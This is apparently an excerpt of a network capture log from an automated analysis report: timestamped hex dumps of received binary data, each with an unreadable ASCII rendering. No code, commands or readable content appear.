                                                                                                                                                            Data Ascii: x~lY>8tFM&g;%mE{dbfe@e*._dtI;}t/N`2t;XCt@d{0T;OkvHZwSs,o oPqGX=;s(RKY4rC-=R;q|S.>gZk80F"
                                                                                                                                                            2022-09-29 12:45:07 UTC13517INData Raw: 10 76 be 98 50 05 de 47 65 e5 cd c1 50 1b de 90 69 fc ec 09 0e 7a f8 84 81 c3 49 c8 ad 15 43 d2 0d 9a d4 82 e6 ba 51 b5 ae 73 5b 93 10 0b 97 82 73 e3 c6 d1 81 1b 4d ae 8b 7f 6f e5 09 c7 fa 57 b2 8a c7 12 f9 2f 6f a1 a6 cf 44 e1 42 e4 e4 64 4a d8 37 38 af 67 7d ca bf eb 57 23 8f fe a8 1f a7 08 09 06 f1 39 72 7c 08 33 a1 63 41 04 0f 14 20 64 e3 98 4c 1e f1 e6 63 68 50 b5 b1 b2 6e fc f6 34 d5 84 b0 47 39 5e d4 51 5c fa cc 63 3f 53 20 4f ef d1 7d 7e 00 9d 0f c9 50 d1 d2 e9 0a af 56 84 e4 ab 1a 50 09 61 8a 4d fd 25 0c 0c 04 7f 9c 30 5b cb 95 df 3d e2 13 43 c2 63 43 b6 91 2e 53 d6 a0 f9 67 6c 59 2c 35 05 64 1b e7 a7 40 15 35 80 70 9b 88 a1 e8 4b 3c 2f 6f 25 a8 8e 18 c9 d6 1f 2a 4f 3f 96 c8 0a 5f 01 7a 92 83 76 97 6f 1e a8 31 05 f9 ff 49 a4 c8 30 33 bf 15 b7 fa
                                                                                                                                                            Data Ascii: vPGePizICQs[sMoW/oDBdJ78g}W#9r|3cA dLchPn4G9^Q\c?S O}~PVPaM%0[=CcC.SglY,5d@5pK</o%*O?_zvo1I03
                                                                                                                                                            2022-09-29 12:45:07 UTC13517INData Raw: bc 1c a4 14 d4 89 f1 cf e6 2b 5e fd c8 48 98 fb 9e e0 56 f8 35 17 ae b9 08 ac 3c cf 55 56 02 a5 9f 32 c6 8e 83 4f 66 75 8f d3 0c 29 46 57 72 a9 b2 93 3c b7 c7 96 15 3e 9e 57 2d 7d f2 f0 79 4f a5 d3 3c 93 d5 09 5b 91 c9 fb 54 8e 04 48 b1 1c ed 8c 9b f2 0d 77 d6 e2 9b a1 7f d0 65 2a 7d fb 11 fb 10 56 10 65 03 64 6d c2 da 1a 94 49 fc 30 ed db 84 28 f4 5b e2 1f a0 a0 33 b1 c8 33 71 ac c3 1b a6 e8 9a bc 38 b7 0c 28 5d 84 2a 4b 66 6f fe a1 46 2e 67 8b 22 ab 55 d7 a1 e4 7e 69 c1 19 28 6b e1 50 e6 f9 cf 81 83 93 2c 16 1d 60 62 77 64 fc 15 c9 20 33 cb 43 33 56 3d 96 9d b7 cf de 98 d8 ab 69 7c 11 93 59 21 fd 39 10 49 af 6a 51 0f 75 97 61 de 4f 80 7a 61 8c 94 4f 91 85 4d 4a 1c 32 9f 6e c8 21 25 ea 32 4b c1 86 8c 70 20 1f ac 09 18 d4 4f c7 55 99 40 c5 60 e9 d8 98 33
                                                                                                                                                            Data Ascii: +^HV5<UV2Ofu)FWr<>W-}yO<[THwe*}VedmI0([33q8(]*KfoF.g"U~i(kP,`bwd 3C3V=i|Y!9IjQuaOzaOMJ2n!%2Kp OU@`3
                                                                                                                                                            2022-09-29 12:45:07 UTC13533INData Raw: da 0c c7 e8 0e 77 5e b5 9b 17 cc c2 56 3b 99 5a 91 c1 40 74 ed 0e 8e 80 95 19 fb 43 ea d9 22 a2 16 4c b4 a3 9a 84 12 c5 1d c4 72 0f 16 66 2e e5 4f 74 87 65 ab 9c 3b 37 18 31 1e b5 ba 93 e5 2a ae b3 d2 e4 94 38 b4 57 c3 3a e3 1b f6 6e 5b ca c4 03 36 2a ef fb f0 6f 02 39 99 52 f3 ee fe 7b 35 73 c2 49 fd 91 e5 01 a9 2e 83 41 06 51 0a 1f 0f 05 0e d4 5d 6a a5 eb 9b 55 dc 19 cd 1f 70 d6 94 35 cb e1 e3 78 bb 1f 49 f7 a8 d3 e1 30 2a 83 3f 78 6e 60 93 ba 8d 58 9b 02 a1 7b 02 31 08 05 57 41 c4 0d 3a f9 f7 74 e7 d1 03 72 21 f7 e5 1f 4a 3c 94 46 53 e0 5d fb 00 4b a3 a0 b0 0a c2 6d 28 75 7f 98 2c 93 3c 9e 94 4d b9 f3 ed 74 7a c7 53 58 b4 32 5a c4 9a 4a 31 10 c7 a0 bf ee c5 17 c8 b7 2b 1f 82 92 71 55 41 78 1b 93 77 da 7c fe d4 a2 bf 37 8f 51 b9 6f b7 bf 4f c8 88 c2 fd
                                                                                                                                                            Data Ascii: w^V;Z@tC"Lrf.Ote;71*8W:n[6*o9R{5sI.AQ]jUp5xI0*?xn`X{1WA:tr!J<FS]Km(u,<MtzSX2ZJ1+qUAxw|7QoO
                                                                                                                                                            2022-09-29 12:45:07 UTC13549INData Raw: 4a ba e1 2e 14 ed 2d a9 8b 03 b0 ca 85 44 b6 cb 1a c2 d8 01 64 bd 14 a8 86 6a 32 db f6 34 c4 a4 12 78 4e 63 48 91 a3 4f 38 55 cc 41 87 08 50 ab 9d 3a b4 2b 9a 77 e4 cc 2e c9 49 9d f8 66 d4 87 e0 e9 ab 7d bd 12 41 f5 31 bf 76 2b 80 c4 cc 87 f9 4e 4e a6 68 08 15 2d 72 16 d3 01 3f 51 76 ae d9 89 0e 07 b8 5a 43 b2 89 8e e0 e3 21 df 04 43 c7 30 89 51 16 68 45 59 52 08 0a 93 5d dc d8 11 94 e4 25 2e 3a da b2 38 9c d1 9e b2 bb d5 3c 26 67 63 1e 6c b8 2c 99 c2 b1 56 18 87 73 1d f2 26 71 6d 59 91 7c a3 40 55 55 39 7a 5d c8 47 28 03 7f 5e df 98 64 1e ad 39 aa 1b 9a 67 9b 7e 87 26 fd c4 4b a3 57 8b 91 56 b5 c4 81 4f 63 0b 15 4d 54 5c 2b 89 2b 3c 38 8c 7b f7 56 7d af 5c c2 8f fd e8 74 f3 94 a3 8a dd 42 1c 62 7e c0 5a 92 7f 1d e4 ac af bb a5 db 0d d5 66 17 66 cf 00 bf
                                                                                                                                                            Data Ascii: J.-Ddj24xNcHO8UAP:+w.If}A1v+NNh-r?QvZC!C0QhEYR]%.:8<&gcl,Vs&qmY|@UU9z]G(^d9g~&KWVOcMT\++<8{V}\tBb~Zff
                                                                                                                                                            2022-09-29 12:45:07 UTC13565INData Raw: 23 60 d2 c6 ca 55 86 c6 7e 8f bc 08 07 b8 ed c6 79 ff eb 3c 89 7e ba c8 1d 09 3d 0a 6c fc 36 2d be 62 18 12 9a 89 35 1d ff f1 b5 11 74 97 de e8 70 c4 46 ba 82 c8 6d bd 00 c0 99 bd ca af 88 d4 d2 b7 83 c2 13 62 77 d7 a4 30 e9 85 36 21 2e 39 ef 78 0d 2c fe ad b2 a0 a8 f1 71 0c e6 c9 fe 30 61 90 92 ef 81 86 12 14 50 ce 99 16 f6 9e 29 9e 46 03 ac 62 b2 36 f6 5f 97 18 a8 0b 2c 15 11 34 f6 30 d8 eb 1f f2 5a 1e 9f 6a 37 ae ca 9d 32 eb a1 88 ba ac 8e 56 ed 05 a0 05 4c 7b 86 fc b5 ce 40 e4 25 f8 b9 2c fa 2d 95 61 72 01 dd 11 ce 7c 66 75 b7 f9 6f 56 99 bc a4 d8 2c cb 1f 8a 50 42 ac 67 aa 7f 47 8c f1 8c 1f 98 e5 54 65 14 1b 9d ca be b8 b1 07 03 aa e0 26 f7 d9 be 66 02 be 52 9b ba dc 01 da 31 7f b2 ca a8 d3 4a b3 a1 96 58 d8 41 97 e5 2b 1b 05 55 bc 58 74 f9 89 a8 1e
                                                                                                                                                            Data Ascii: #`U~y<~=l6-b5tpFmbw06!.9x,q0aP)Fb6_,40Zj72VL{@%,-ar|fuoV,PBgGTe&fR1JXA+UXt
                                                                                                                                                            2022-09-29 12:45:07 UTC13581INData Raw: 1b c1 94 d6 02 ee 22 a6 9e 02 05 6c 27 96 fa 60 d2 c4 db cd 15 4b 29 1a fb 0e b6 f6 1f 4e d4 fe ad 1e af 6c a2 c3 7c f2 c1 73 e9 93 20 42 a1 d3 28 d8 8a 05 5d 89 b6 58 f9 1a 1c 48 f3 dc ca f8 ef 26 b3 a7 7f b4 5e 4a 5e 61 df c8 0b b1 90 47 74 dc 16 18 bc 5b ba e0 45 a8 5b 6e 15 08 c3 2f 77 dd c1 1c 45 3c d0 19 76 7c 57 9f ce 67 28 a4 65 d4 e1 89 eb ca 72 67 b0 a8 ba d6 99 b6 20 f1 5f 6e df bd fb 4a b4 c6 93 3d 43 ef b1 10 b1 b4 46 9b ec 99 55 c3 77 fc 44 7f 78 c0 b4 39 89 90 7b 34 41 7f f7 af 1c 2d 64 62 63 94 7e 79 e3 5a 94 3e fb 3b b1 a8 21 93 88 83 c6 07 cc d8 fe 5e fb 49 e1 31 cd 58 d4 7f 01 9a 3e f3 81 57 e6 a6 fc a9 b7 e7 8f bb 48 7c 71 2f 7b b1 70 aa 93 00 15 a1 7f 06 88 c0 82 8a 1b 9c 72 52 c8 67 eb de d4 73 13 f5 17 fe c5 76 a0 02 fb 95 15 7a 3b
                                                                                                                                                            Data Ascii: "l'`K)Nl|s B(]XH&^J^aGt[E[n/wE<v|Wg(erg _nJ=CFUwDx9{4A-dbc~yZ>;!^I1X>WH|q/{prRgsvz;
                                                                                                                                                            2022-09-29 12:45:07 UTC13597INData Raw: 01 72 8b d6 cc 37 f8 03 d4 eb d7 ee 16 4f c9 65 71 65 6b b3 96 e1 9b f1 4d 06 e5 d3 e3 98 04 21 ca ba ad f5 f4 c4 13 db a7 22 72 ce 75 6e 18 39 72 8d db d2 7c ea dc ac 4c 9a ec b8 b2 0c 97 91 99 f9 c5 2e a8 a1 bc 5e 2f 93 79 c7 41 cb 7f e3 c7 d8 e7 38 12 2d bb 7b d3 56 4a a2 f6 07 f5 eb a3 5d 29 47 4a 07 af 53 23 19 b6 25 a6 e2 d7 98 6a 53 51 e2 88 aa db 25 00 4c d7 9e fb 00 52 f8 bf ad 7c a6 fa 22 5e fe 84 14 fd 9d bf b0 63 e6 78 c5 30 9b aa 98 9c b6 3a 19 59 db e9 80 c7 2a 17 1c 0c 10 b7 8e c9 c5 31 05 43 21 1b 6b ae 3e a6 76 27 3a 08 9e 83 c6 1c 31 63 7f 38 50 e8 8b a0 40 63 a2 dc 55 b1 67 7a 12 15 b6 3f 1d 33 33 6d a1 b8 f5 ec 1d 52 8d ed c1 13 39 2d d5 7d 97 ab c8 0f 81 aa fe 33 9c 52 1d 6c 80 8b c7 55 39 57 4a 4b 83 07 fd 58 1c 99 a9 29 1e 95 b3 4c
                                                                                                                                                            Data Ascii: r7OeqekM!"run9r|L.^/yA8-{VJ])GJS#%jSQ%LR|"^cx0:Y*1C!k>v':1c8P@cUgz?33mR9-}3RlU9WJKX)L
                                                                                                                                                            2022-09-29 12:45:07 UTC13613INData Raw: e7 e3 9b a8 25 20 f7 05 f2 4b 4f d8 6b 16 02 1d fe 48 ff b2 c9 f3 cb 6a 4c 4a 13 7a 97 57 bb a9 67 32 89 b1 0b f4 e7 8d a2 d7 bb d4 53 6e 6b 19 f9 e0 a5 5c e8 92 ca ec 60 c6 b8 1f c9 d3 85 dc 0e f3 63 50 49 ed a0 e3 92 8b 00 09 a7 70 e3 20 85 52 29 a0 4f 30 f9 1e fb c9 44 bc d2 9d ed ee aa 70 b7 f1 70 e7 5b c2 eb d5 27 c4 7b d2 38 bf 31 a2 a5 d4 3f 1b 6a f0 d4 d3 38 b5 2b 3c dd d9 46 a5 20 0e fa e8 94 20 8f 98 4c 0a fe 91 23 09 55 ef b8 48 79 d2 e7 d9 f3 36 52 3d 7f b6 c4 20 d7 76 37 27 1c 5d 28 04 dc 46 2c 92 2f 55 cb 10 bf a8 6c a9 2d 10 5e 58 ae 05 7a 85 07 69 7c 54 1f f5 6a 74 65 13 f4 d8 58 fb db 6c 0c bd 5a 2b fd ef b4 a7 0e 30 ac 0c 74 8c ae f7 f2 f9 a5 25 4e d3 53 a1 1a 7b 96 bd e2 1b a2 a0 5d c0 92 01 bc cb ce 97 dd 62 8a 0e 9e db 57 83 15 79 ea
                                                                                                                                                            Data Ascii: % KOkHjLJzWg2Snk\`cPIp R)O0Dpp['{81?j8+<F L#UHy6R= v7'](F,/Ul-^Xzi|TjteXlZ+0t%NS{]bWy
                                                                                                                                                            2022-09-29 12:45:07 UTC13629INData Raw: a0 45 01 58 c7 82 91 00 a8 f0 e5 c7 66 cf cd 0b 69 15 cb 59 b2 d5 f3 0a 91 46 37 33 d1 30 39 a0 eb b3 e1 e0 db 2e 3f cc 55 53 b3 bf b4 db 22 34 73 5c 33 11 9b 1b f2 f1 9b e0 c6 e0 a8 1d 4e 12 f2 f9 b5 a6 89 ea 36 8d 1c ad b6 11 92 2d ca af 07 4d 20 84 dd 03 24 6d 82 c9 bb 52 be 5a 20 75 2f 47 6d f8 52 87 29 31 60 11 28 b5 ad ef 5b a2 1f 81 80 23 b7 4e de fe 9b 50 6a a7 e7 a7 36 82 d7 0f 08 ef ae ad 7e cd 7d 19 8d f9 df 97 ee ba a2 a2 7b 87 cd 3d 0c e4 52 9f f2 35 4f b9 7e b4 31 e6 83 94 d1 bf 76 50 97 cc 94 5a 0c d1 4c 6c f9 03 18 4a 41 63 18 62 d5 92 47 e1 34 ad d0 0b cd 40 40 b5 fb 21 9c c0 92 a4 1e d6 63 b9 a2 22 12 ba cd 61 0d c2 c3 be 33 e5 46 bd 6a e5 bd b5 1c 94 1d ea b8 40 94 be 78 79 2f 21 64 37 dd 5c f7 b9 53 91 6e 2f 47 c9 50 2d fe 3b cf cf 63
                                                                                                                                                            Data Ascii: EXfiYF7309.?US"4s\3N6-M $mRZ u/GmR)1`([#NPj6~}{=R5O~1vPZLlJAcbG4@@!c"a3Fj@xy/!d7\Sn/GP-;c
                                                                                                                                                            2022-09-29 12:45:07 UTC13645INData Raw: 47 1a d8 6d 88 55 53 3f f1 67 44 25 db 3a 8b 12 3a 19 2a 8d a3 ae 0c 98 d7 27 8f e0 df 5f 62 05 97 db 81 8b 69 3e 74 54 5d b9 c9 22 42 7e 48 f6 c7 77 d1 d3 18 3e a4 cd bc 02 39 1d d7 a0 0b 19 78 96 ab 69 f9 0a 40 20 75 5c 95 2f bb c1 0e 39 92 db 03 38 67 17 ef d7 f1 ad 94 97 0b 17 76 ef ee b6 c8 26 c1 d2 87 89 34 ef cf e7 31 e0 c3 9d 9e 31 f1 87 b4 ae 75 7f 38 7c 40 89 fd cc dc a7 d6 e3 11 89 6b 61 c1 79 ec fb e2 4c ae 91 1a 28 78 75 ec 68 5e b2 4b 0e 9d 26 4c da 79 f7 07 d6 72 9b 87 22 bd b4 59 56 ef 63 75 10 86 31 9e 19 cd 5f 91 fe 66 24 d1 9d 5c dc 0f 4b 0d ab 50 c5 75 78 c8 92 fd a0 7e a0 c8 a3 a5 14 8e 58 6b f9 da 81 bb 33 ad 5b 05 69 e0 9d 34 9d 78 b0 00 ef 32 aa 29 34 b5 f9 3a af ee e6 14 60 4c 1c a6 f5 a8 49 08 ef c6 46 e0 62 1a a1 49 8e 54 a1 c3
                                                                                                                                                            Data Ascii: GmUS?gD%::*'_bi>tT]"B~Hw>9xi@ u\/98gv&411u8|@kayL(xuh^K&Lyr"YVcu1_f$\KPux~Xk3[i4x2)4:`LIFbIT
                                                                                                                                                            2022-09-29 12:45:07 UTC13661INData Raw: fb 28 69 08 6f 7d 52 f8 d7 f5 67 63 f9 b6 36 9e 4b 8f 28 bb 91 85 01 da 3c f6 f5 65 0a eb cc 17 ed f7 f7 b1 4e 4d 18 1d 58 58 1c b9 a3 92 3a 6f 46 25 03 7f f8 83 6f f6 9d 6f 6e ee cf 2b be cd 15 1e 25 63 b1 ee 7e 36 77 2e 4c e4 a9 b0 e5 65 6c e9 a5 90 4c ce 3d ce 6b 3d 59 26 cf 43 10 63 c1 47 f3 5c 9d f1 e2 86 7d ff dd 90 96 c7 34 ba f9 a9 5b 7c d9 ac fa 1f 62 fc 49 07 68 5d d7 53 e2 57 82 bd c6 ea 4d 3c 70 b1 d3 38 88 fd d2 ea 93 92 0b 74 bd e5 64 85 1b 80 5d 0a 58 8c b5 db 22 40 7d d6 45 9e c1 ed e6 8b 86 a9 d2 c8 3e ef be 07 6e f0 22 49 09 b7 73 61 67 5c 43 c9 ec 96 03 66 bf 32 62 2b 1f 6c 77 d0 15 80 a3 e4 3e 0d 60 ad fd 01 4a da 34 4c 64 02 62 b8 a2 03 e8 77 cb d9 1f f5 60 94 82 15 6a be 5f 09 90 e8 f0 c7 86 e5 1d d9 b7 d0 dc 0f c9 36 ab ca 1e d9 03
                                                                                                                                                            Data Ascii: (io}Rgc6K(<eNMXX:oF%oon+%c~6w.LelL=k=Y&CcG\}4[|bIh]SWM<p8td]X"@}E>n"Isag\Cf2b+lw>`J4Ldbw`j_6
                                                                                                                                                            2022-09-29 12:45:07 UTC13677INData Raw: 31 ed 18 1b ee db b1 da c1 51 d0 a8 8a c3 a5 ab 5c 64 ba 78 37 a9 c6 8b 62 e8 85 70 9f f9 ae 8c d2 86 a9 55 ea d1 d0 5b 84 5e bc bc 07 02 92 a2 5b f1 59 64 5e 8c 05 6a 0c 31 c9 9a be ea 78 28 b8 92 b9 2a af c1 ac 06 3e eb b6 b1 fd 15 0b a5 f5 47 cf a8 60 86 42 c3 b6 3a 92 21 5b 7e 98 de f6 c6 14 10 69 97 ab 00 f5 9d b1 48 b7 7f f1 a3 54 03 1d a0 08 b9 b6 46 f3 e4 e5 48 40 c3 a3 28 81 cf 3f 2e a6 1e b1 46 19 9a d6 62 77 0a 01 b4 c4 9f 70 28 c1 e6 43 52 f3 c4 b8 db 25 c4 0b 9f 6e 47 10 38 25 8d 24 4c 6c 93 63 7c 49 0f 71 76 8b 15 1f 9a 70 40 9e 2d 43 2d 77 fe 61 69 df a4 a2 03 ca 67 0a a1 43 e7 84 68 ec 3b b3 83 f2 7f 99 04 27 22 ef 1b de a5 7e f9 8e 0f cb 6b 89 47 3f 0d 4c 24 dc d4 e6 09 0f 87 86 44 5a 44 c4 7c 03 f7 80 f8 fc 39 73 07 1c 54 eb ce d6 cc c6
                                                                                                                                                            Data Ascii: 1Q\dx7bpU[^[Yd^j1x(*>G`B:![~iHTFH@(?.Fbwp(CR%nG8%$Llc|Iqvp@-C-waigCh;'"~kG?L$DZD|9sT
                                                                                                                                                            2022-09-29 12:45:07 UTC13693INData Raw: c8 2e 59 f3 e2 55 c9 4f 68 b4 c4 f7 da 86 da 50 f3 be 74 69 ab 52 07 da ae 94 d1 c1 07 e1 c8 71 ce 62 6a 2f 17 2a d2 ac 4e 9a d0 55 85 2b 22 b4 d8 e7 d1 a4 69 da 9a 58 fd 1e e5 df 8f 7b 17 8d b7 05 c1 7c e1 90 74 d2 8b 39 98 90 68 94 8b 40 fe fd 78 fe 90 bc 57 55 eb 7f c7 7d f0 7e b4 d6 7c 8d a3 a3 da 2c 4d 81 d4 6d 3f 8b 49 85 e9 99 2f ce 6d f5 ae 4b 3f c2 72 e4 6d 08 84 6d 0b d3 9d f7 48 93 ee 4e 41 9b 42 d1 dd c3 d0 57 fd bb 42 d3 65 f3 94 f4 32 94 b0 53 c5 35 d3 ad 09 4a 2d 61 44 8a 9a 43 d6 0c e0 e3 26 6b 8a 8a d4 90 19 e4 5e 53 db e7 48 2a dc f6 50 f3 89 9d b1 99 23 a6 9b 32 a3 6a 1f a4 c6 b3 03 eb 06 16 c8 7c 6d d3 be 4f 17 ac 03 ad bf 1f 8a 47 26 88 e5 d4 9d 3a 06 68 8b 65 2c 35 0d aa 89 10 72 0c f3 60 8c f1 e7 9b 5e fc b0 27 fc b4 58 dd 0c c9 80
                                                                                                                                                            Data Ascii: .YUOhPtiRqbj/*NU+"iX{|t9h@xWU}~|,Mm?I/mK?rmmHNABWBe2S5J-aDC&k^SH*P#2j|mOG&:he,5r`^'X
                                                                                                                                                            2022-09-29 12:45:07 UTC13709INData Raw: 16 b2 05 fa 7b 58 3c 3d 65 26 e3 17 92 dd 8c 6d 41 cf 72 02 39 bc ba c4 27 05 9d dd 1e cf b6 8d 68 ec 0c cf cd 23 00 dd d9 a9 11 fe 3a 34 e4 d0 af b4 35 c3 b0 3c 54 13 8b 71 13 08 af 1e 4e 0e b4 63 c9 84 83 0e 42 6b 23 c5 70 2a b6 5a 8a 80 d9 be fb 1b 89 6c e2 24 e5 95 1e 6f ad 3d a8 ca e0 df 95 47 a5 89 a7 14 b3 1f 4c 35 19 de 48 c2 30 84 6d 94 6b e5 af 69 df 7d 4d 3c 8f 7c b3 31 1f fa be 66 1a a7 ba 4c 93 7e 34 27 f6 7a aa f5 31 df 83 57 51 0b c8 0a f2 08 95 50 15 5d 9d 4b 05 7a d1 f0 2d 3d f2 a6 e7 4c dc 28 c9 90 24 58 dd 7d a8 aa 42 b8 cc 0b 06 66 c4 66 4e 9c 07 ff 9f 0c d1 f2 83 f7 f7 b0 81 dc a3 e7 f7 5d 5a 8e 10 89 9e 74 97 c3 71 f8 11 d1 ba 1a 04 cc 39 57 13 83 4c 9f fc 33 33 35 8a 4c 1c 9e 10 57 7e 35 0a 50 e5 eb ed a9 dd 6e a4 8a 60 30 da 64 6a
                                                                                                                                                            Data Ascii: {X<=e&mAr9'h#:45<TqNcBk#p*Zl$o=GL5H0mki}M<|1fL~4'z1WQP]Kz-=L($X}BffN]Ztq9WL335LW~5Pn`0dj
                                                                                                                                                            2022-09-29 12:45:07 UTC13716INData Raw: 10 3f d6 52 f2 03 7c ae 57 ec 8a 58 dc 0a f6 ec 0b 82 9b 27 4d 8a b5 7e 5d 84 b1 7e 37 dd c2 3e 09 64 0e d3 09 2e b7 9f bb 53 7f 73 e9 18 d0 ec 09 bc 92 09 61 ff 9b ab 95 d3 8a c7 82 9a 35 b5 0e f2 1b be cd 34 a8 5c 77 a7 29 ee c6 ff d4 25 d1 d5 dd e8 c8 c8 5f 7c 15 9d cf 07 1f 5b df 5a 73 39 1b 15 03 5c b0 12 8b 06 8e b4 b4 0c 40 6e 60 9d d9 cc 3f 25 67 8d ea 94 af 81 23 b8 d3 4d 7a 2f ae a5 26 9b 6e a3 9f 9d 6e c4 e5 29 42 3a 49 54 38 18 6b 5d 56 2d 47 b9 7b bf 15 db 3a 54 72 26 4b 9d df 63 c4 eb 72 8c e3 77 e8 40 ab 36 22 17 87 fe 9a 34 05 4c 3f 10 2b 32 e2 45 28 9f 48 3e 33 52 1d 05 02 98 2c 19 1a c2 39 30 e1 b8 f9 8c e7 bc ac 84 49 e8 46 05 43 63 7a 2e 0c 60 e2 8d 71 7c a5 ce 05 db 91 cd 8d b4 c4 a5 7b 9e 63 7b 45 71 2b 5f c2 67 98 a2 d7 54 d2 f7 f3
                                                                                                                                                            Data Ascii: ?R|WX'M~]~7>d.Ssa54\w)%_|[Zs9\@n`?%g#Mz/&nn)B:IT8k]V-G{:Tr&Kcrw@6"4L?+2E(H>3R,90IFCcz.`q|{c{Eq+_gT
                                                                                                                                                            2022-09-29 12:45:07 UTC13732INData Raw: 59 78 a4 7f 29 f8 19 ef e3 15 d4 93 3d 0c 3a 31 e8 3d 0d 61 b4 3b a1 ca 77 6e a4 89 14 e2 6d ff 60 e1 73 60 0c b2 0e 15 c9 4f 35 a2 c3 65 6f 7a a0 e7 b0 90 fc 58 a1 ff 4c ee e2 ec 0e a5 2b 6a 1f ca 97 be b2 c6 2b c1 e2 ee 7a 50 51 43 27 59 66 1f c2 f9 ab b9 2c c3 f5 a6 b1 46 15 c3 c1 78 1c 91 42 ee 14 a5 a2 b9 ce b9 c6 49 bf ec 6f 6a f9 51 73 3c 18 b2 7a 14 ab 36 98 e1 bd 4d f6 e5 cd 8c 4b 4f c8 42 85 db 48 6d a3 d9 59 96 80 33 33 fe b3 c1 a3 c7 9d 70 6d 31 59 d1 1a e3 2b 90 2c c6 44 05 c0 9d 14 4d 8d 3b d6 f9 56 c1 1a 0c ea 34 31 f5 94 c8 89 9a c6 db 1b 17 c9 f7 63 6f 86 f4 02 53 08 75 76 6b ec cc 13 ab b1 91 fb c7 63 e0 8f 94 01 48 84 b8 62 7b 4d 1b 33 65 86 eb 95 5e 41 d4 88 17 7f 9e de a5 e0 29 8f 77 4a 92 d0 7a 44 84 f3 10 0e 82 ac 85 d1 cb 2c 31 dc
                                                                                                                                                            Data Ascii: Yx)=:1=a;wnm`s`O5eozXL+j+zPQC'Yf,FxBIojQs<z6MKOBHmY33pm1Y+,DM;V41coSuvkcHb{M3e^A)wJzD,1
                                                                                                                                                            2022-09-29 12:45:07 UTC13748INData Raw: 48 c8 50 4c c1 3b c4 b8 cf 7b 78 cb 77 84 fb a4 e2 27 fb 68 d9 15 47 e6 a2 cb 4e dc ee 8e 71 d1 0e 77 0a 4d b1 59 32 83 da 97 3d b4 b8 30 6a 34 16 5c 0a 3b d3 9c 2f 09 fd 2d 53 ec eb 90 70 fe 61 c6 ca 2c f2 e9 a4 37 f9 52 25 de 80 59 63 fa 7f 67 5a 4f fd 17 12 f1 fe c1 9c 2e 01 5a e2 7c 6c d5 83 22 08 ef 16 6f 5d de 7a da 2b 2e d3 f6 68 9d 60 06 17 5a 7c a7 6b 50 f7 8a 40 5a 0d 22 0b 33 f2 6b fa 52 73 5b 37 b1 12 8d 62 be 5d 3e 22 3c 7b 7c 0d 20 ac 10 99 a3 12 c0 ce 5f ab 25 31 24 07 a8 b8 5a 0a b6 0d d6 c4 da de 87 1e ed 6a b9 69 23 93 19 bb ce c2 f9 12 e8 17 1b 10 d6 ef 97 8c 67 a0 0a c5 8e 93 68 bd 24 1c 6f 64 f3 5e d7 f7 ba 9f 13 83 3a e3 85 63 ec fb 91 41 91 90 70 5c 5f 03 c4 ce 8e 2a ff 6b 18 f7 a7 c7 e9 93 ab e4 cd 03 fb 23 5e af 4e 4f e2 7e ac ab
                                                                                                                                                            Data Ascii: HPL;{xw'hGNqwMY2=0j4\;/-Spa,7R%YcgZO.Z|l"o]z+.h`Z|kP@Z"3kRs[7b]>"<{| _%1$Zji#gh$od^:cAp\_*k#^NO~
                                                                                                                                                            2022-09-29 12:45:07 UTC13764INData Raw: fc 2a 5d 3e 24 e7 91 9c ac 59 09 8b aa 8d 46 a3 f5 f3 29 14 95 66 70 bb 72 12 6b 1b 82 79 d3 a3 81 ea c3 4c b1 bb 34 8a d1 02 47 fd fe 1c 67 e1 93 6e 98 87 20 b9 b6 a5 01 c1 50 24 44 21 a8 96 7f b2 22 c5 54 e4 c5 08 09 ad 47 ef f4 e0 0c 7f 2f 01 69 f7 9b f5 f8 20 80 d4 9c 2f 9a 6c ab 3c 93 b2 15 ea 62 77 67 13 6e 1f 10 c0 51 14 0b 24 85 b4 42 be bd b8 ad 12 4a 57 d6 bd 43 c9 c4 a9 fa 52 4d e1 24 63 6c 84 42 48 c3 85 67 fe cc 44 94 e2 a5 c7 55 c2 15 e6 5f d2 ab 2f 41 68 b2 c8 ef 50 2e d1 3a 0e 8c 79 94 25 96 53 f1 0e 92 26 1b b8 1c 13 92 4f d5 c0 e0 66 e5 c8 cc c7 0c 37 3b 7d 0d 17 88 f2 6b 08 27 5a 39 b2 0f be b3 a3 36 ba 3f 1f fe 0a 28 89 6b 4c 97 28 fe 64 f1 3b ce 42 a2 68 d6 d5 4f df 97 19 75 8d 04 9a 3b 56 cd f9 c0 d4 a0 d1 8d 67 bd d3 e0 99 f0 b1 27
                                                                                                                                                            Data Ascii: *]>$YF)fprkyL4Ggn P$D!"TG/i /l<bwgnQ$BJWCRM$clBHgDU_/AhP.:y%S&Of7;}k'Z96?(kL(d;BhOu;Vg'
                                                                                                                                                            2022-09-29 12:45:07 UTC13780INData Raw: de 59 d6 dc b1 04 7d 24 71 1a 52 89 64 36 82 42 ce 34 c1 f5 dc 76 1c 39 d4 21 66 9e 7d ca 48 48 a5 a0 82 42 30 d2 5b 52 68 1e ce e8 84 22 0f 1c f7 b5 22 5e 1b 35 7d c5 ff ff 0a fc fe be 7e 8e 62 79 e6 7c 3a a0 51 19 ee f4 f3 8e 92 1c 8a 6d 71 c8 cd a9 f8 08 40 a2 e0 b5 83 fd 5d c2 86 4e 7e 13 b9 c3 3a 1b fb 6e c3 95 b7 5e f5 08 51 20 01 10 3e 08 68 e3 9a 1b 0e 3a 45 7e 8f 3e 78 8f b4 60 67 03 41 e0 d2 f1 8e 82 15 f5 dc 63 c3 dc 65 9d 9c 75 73 b9 68 c4 2f a2 be 5b f6 c8 30 7c 6c a5 19 23 9f d6 43 e4 06 47 eb 28 60 f1 c0 22 ab 7f 79 3d 2f 95 e7 86 de 5e e7 78 c9 0a 5b 7e 8f ef bd 5b 8b c9 99 fc d4 55 b8 4e f5 47 75 46 c4 81 b6 2c 0c 94 f9 b6 3d 83 ed fa a2 fc 73 22 1f 0e d4 f9 47 9a 3c bf 1c 09 3e 93 64 6f 32 69 0d 35 55 5e 2f 00 19 df 4e e2 d1 29 56 ba 26
                                                                                                                                                            Data Ascii: Y}$qRd6B4v9!f}HHB0[Rh""^5}~by|:Qmq@]N~:n^Q >h:E~>x`gAceush/[0|l#CG(`"y=/^x[~[UNGuF,=s"G<>do2i5U^/N)V&
